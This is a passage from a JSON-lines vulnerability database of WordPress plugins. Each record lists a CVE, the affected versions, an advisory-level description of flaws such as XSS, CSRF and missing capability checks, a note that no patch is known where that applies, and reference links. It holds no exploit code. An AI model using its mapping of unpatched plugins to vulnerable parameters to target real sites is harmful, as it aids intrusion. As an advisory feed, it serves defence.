replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40cb3214-a11b-4bee-9422-256d12303460?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40cb3214-a11b-4bee-9422-256d12303460?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-checkout-cielo\\\/trunk\\\/includes\\\/class-wc-checkout-cielo-gateway.php#L296\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-checkout-cielo\\\/trunk\\\/includes\\\/class-wc-checkout-cielo-gateway.php#L296\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7485","slug":"traffic-manager","versionImpact":"1.4.5","description":"The Traffic Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'page' parameter in the 'UserWebStat' AJAX function in all versions up to, and including, 1.4.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2f508f1-45a0-4cb4-9d67-51edd3d74abe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2f508f1-45a0-4cb4-9d67-51edd3d74abe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/traffic-manager\\\/trunk\\\/traffic-manager.php?rev=1709967#L2745\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/traffic-manager\\\/trunk\\\/traffic-manager.php?rev=1709967#L2745\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/traffic-manager\\\/trunk\\\/traffic-manager.php?rev=1709967#L2375\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/traffic-manager\\\/trunk\\\/traffic-manager.php?rev=1709967#L2375\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4529","slug":"security-antivirus-firewall","versionImpact":"2.3.5","description":"The Security, Antivirus, Firewall \u2013 S.A.F plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 2.3.5. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address from logging in.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd177a43-6059-4125-9408-1090b9a54117?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd177a43-6059-4125-9408-1090b9a54117?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-antivirus-firewall\\\/trunk\\\/includes\\\/wptsafEnv.php#L68\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-antivirus-firewall\\\/trunk\\\/includes\\\/wptsafEnv.php#L68\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9241","slug":"pdf-image-generator","versionImpact":"1.5.6","description":"The PDF Image Generator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.5.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1454af30-319a-44b7-a83e-2d774cfbc8d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1454af30-319a-44b7-a83e-2d774cfbc8d1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-image-generator\\\/tags\\\/1.5.6\\\/pdf-image-generator.php#L329\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-image-generator\\\/tags\\\/1.5.6\\\/pdf-image-generator.php#L329\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10294","slug":"ce21-suite","versionImpact":"2.2.0","description":"The CE21 Suite plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ce21_single_sign_on_save_api_settings' function in versions up to, and including, 2.2.0. This makes it possible for unauthenticated attackers to change plugin settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd6ce97c-fd80-4c43-a4d2-02aa91d11fac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd6ce97c-fd80-4c43-a4d2-02aa91d11fac?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ce21-suite\\\/trunk\\\/includes\\\/ce21-functions.php?rev=3097700#L340\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ce21-suite\\\/trunk\\\/includes\\\/ce21-functions.php?rev=3097700#L340\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12341","slug":"custom-skins-contact-form-7","versionImpact":"1.0","description":"The Custom Skins Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'cf7cs_action_callback' function in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the content of any post and create new skins.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-skins-contact-form-7\\\/trunk\\\/custom-skins-contact-form-7.php#L182\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-skins-contact-form-7\\\/trunk\\\/custom-skins-contact-form-7.php#L182\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cee249d-0a0e-4675-9e35-3a177a3b74a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cee249d-0a0e-4675-9e35-3a177a3b74a2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13700","slug":"embed-swagger-ui","versionImpact":"1.0.0","description":"The Embed Swagger UI plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpsgui' shortcode in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embed-swagger-ui\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embed-swagger-ui\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20e2454f-f49b-413f-ae45-8b628b30a780?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20e2454f-f49b-413f-ae45-8b628b30a780?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0924","slug":"wp-security-audit-log","versionImpact":"5.2.2","description":"The WP Activity Log plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018message\u2019 parameter in all versions up to, and including, 5.2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/trunk\\\/classes\\\/Controllers\\\/class-alert.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/trunk\\\/classes\\\/Controllers\\\/class-alert.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/trunk\\\/classes\\\/Controllers\\\/class-alert-manager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-security-audit-log\\\/trunk\\\/classes\\\/Controllers\\\/class-alert-manager.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3238760\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3238760\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-security-audit-log\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-security-audit-log\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91699d32-1768-4d87-a4f2-91969b3e3355?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91699d32-1768-4d87-a4f2-91969b3e3355?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8243","slug":"wordpressplugin-upgrade-time-out-plugin","versionImpact":"1.0","description":"The WordPress\/Plugin Upgrade Time Out Plugin WordPress plugin through 1.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8e1e2d8d-41aa-49bc-95d5-dae75be788d5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8e1e2d8d-41aa-49bc-95d5-dae75be788d5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5143","slug":"posts-table-filterable","versionImpact":"1.0.4.1","description":"The TableOn \u2013 WordPress Posts Table Filterable plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's tableon_popup_iframe_button shortcode in all versions up to, and including, 1.0.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/posts-table-filterable\\\/trunk\\\/index.php#L1630\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/posts-table-filterable\\\/trunk\\\/index.php#L1630\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3315337\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3315337\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/posts-table-filterable\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/posts-table-filterable\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/447d3aa6-2ed3-4da3-b9e8-fc7792c8c29a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/447d3aa6-2ed3-4da3-b9e8-fc7792c8c29a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7687","slug":"latest-post-accordian-slider","versionImpact":"1.3","description":"The Latest Post Accordian Slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3. This is due to missing or incorrect nonce validation on the 'lpaccordian' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/latest-post-accordian-slider\\\/trunk\\\/lpaccordian.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/latest-post-accordian-slider\\\/trunk\\\/lpaccordian.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04a2c05a-11bb-450e-9ce9-783685730573?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/04a2c05a-11bb-450e-9ce9-783685730573?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1469","slug":"wp-express-checkout","versionImpact":"2.2.8","description":"The WP Express Checkout plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018pec_coupon[code]\u2019 parameter in versions up to, and including, 2.2.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with administrator-level access to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note: This can potentially be exploited by lower-privileged users if the `Admin Dashboard Access Permission` setting it set for those users to access the dashboard.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b35ee801-f04d-4b22-8238-053b02a6ee0c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b35ee801-f04d-4b22-8238-053b02a6ee0c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2879453%40wp-express-checkout&new=2879453%40wp-express-checkout&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2879453%40wp-express-checkout&new=2879453%40wp-express-checkout&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2450","slug":"ajax-search-for-woocommerce","versionImpact":"1.23.0","description":"The FiboSearch - AJAX Search for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 1.23.0  due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fajax-search-for-woocommerce%2Ftags%2F1.23.0&old=2917453&new_path=%2Fajax-search-for-woocommerce%2Ftags%2F1.24.0&new=2917453&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fajax-search-for-woocommerce%2Ftags%2F1.23.0&old=2917453&new_path=%2Fajax-search-for-woocommerce%2Ftags%2F1.24.0&new=2917453&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-search-for-woocommerce\\\/tags\\\/1.23.0\\\/includes\\\/Helpers.php#L1229\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-search-for-woocommerce\\\/tags\\\/1.23.0\\\/includes\\\/Helpers.php#L1229\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/880573d8-6dad-4a1b-a5db-33e1dc243062?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/880573d8-6dad-4a1b-a5db-33e1dc243062?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4424","slug":"slider-hero","versionImpact":"8.2.0","description":"The Slider Hero plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 8.2.0. This is due to missing or incorrect nonce validation on the qc_slider_hero_duplicate() function. This makes it possible for unauthenticated attackers to duplicate slides via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2548890\\\/slider-hero\\\/trunk\\\/qcld-slider-main.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2548890\\\/slider-hero\\\/trunk\\\/qcld-slider-main.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e6d195cd-4df8-4926-b834-d695fc05f81d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e6d195cd-4df8-4926-b834-d695fc05f81d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5125","slug":"formget-contact-form","versionImpact":"5.5.5","description":"The Contact Form by FormGet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'formget' shortcode in versions up to, and including, 5.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formget-contact-form\\\/trunk\\\/index.php?rev=2145639#L504\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formget-contact-form\\\/trunk\\\/index.php?rev=2145639#L504\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdd73289-f292-4903-951e-6a89049d39a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdd73289-f292-4903-951e-6a89049d39a7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-1563","slug":"wp-graphql-woocommerce","versionImpact":"0.11.0","description":"The WPGraphQL WooCommerce WordPress plugin before 0.12.4 does not prevent unauthenticated attackers from enumerating a shop's coupon codes and values via GraphQL.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19138092-50d3-4d63-97c5-aa8e1ce39456\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/19138092-50d3-4d63-97c5-aa8e1ce39456\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-graphql\\\/wp-graphql-woocommerce\\\/\",\"name\":\"https:\\\/\\\/github.com\\\/wp-graphql\\\/wp-graphql-woocommerce\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1909","slug":"categorify","versionImpact":"1.0.7.4","description":"The Categorify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.7.4. This is due to missing or incorrect nonce validation on the categorifyAjaxRenameCategory function. This makes it possible for unauthenticated attackers to rename categories via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58b29729-e9c3-4d57-affd-6142dfa8cc6f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58b29729-e9c3-4d57-affd-6142dfa8cc6f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3034410\\\/categorify\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1717","slug":"admin-notices-manager","versionImpact":"1.4.0","description":"The Admin Notices Manager plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the handle_ajax_call() function in all versions up to, and including, 1.4.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve a list of registered user emails.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0849d86b-5cf1-4346-a9e9-a54768837969?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0849d86b-5cf1-4346-a9e9-a54768837969?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-notices-manager\\\/trunk\\\/vendor\\\/wpwhitesecurity\\\/select2-wpwhitesecurity\\\/load.php#L58\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/admin-notices-manager\\\/trunk\\\/vendor\\\/wpwhitesecurity\\\/select2-wpwhitesecurity\\\/load.php#L58\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6024","slug":"contentlock","versionImpact":"1.0.3","description":"The ContentLock WordPress plugin through 1.0.3 does not have CSRF check in place when deleting groups or emails, which could allow attackers to make a logged in admin remove them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d2cdb4f-b7e1-4691-90d1-cddde7f5858e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d2cdb4f-b7e1-4691-90d1-cddde7f5858e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3556","slug":"cab-fare-calculator","versionImpact":"1.1.6","description":"The Cab fare calculator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the vehicle title setting in versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with administrative privileges to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/219de193-32d0-40b0-a471-bf8bf6e2bb62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/219de193-32d0-40b0-a471-bf8bf6e2bb62?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cab-fare-calculator\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cab-fare-calculator\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9228","slug":"loggedin","versionImpact":"1.3.1","description":"The Loggedin \u2013 Limit Active Logins plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.3.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This is only exploitable when the leave a review notice is present.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59707c64-a34c-45bc-bbbe-d447fe2ca6ab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59707c64-a34c-45bc-bbbe-d447fe2ca6ab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/loggedin\\\/tags\\\/1.3.1\\\/includes\\\/class-loggedin-admin.php#L255\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/loggedin\\\/tags\\\/1.3.1\\\/includes\\\/class-loggedin-admin.php#L255\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-49302","slug":"uber-grid","versionImpact":"1.1.7","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Portfoliohub WordPress Portfolio Builder \u2013 Portfolio Gallery allows Stored XSS.This issue affects WordPress Portfolio Builder \u2013 Portfolio Gallery: from n\/a through 1.1.7.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/uber-grid\\\/wordpress-wordpress-portfolio-builder-portfolio-gallery-plugin-1-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/uber-grid\\\/wordpress-wordpress-portfolio-builder-portfolio-gallery-plugin-1-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
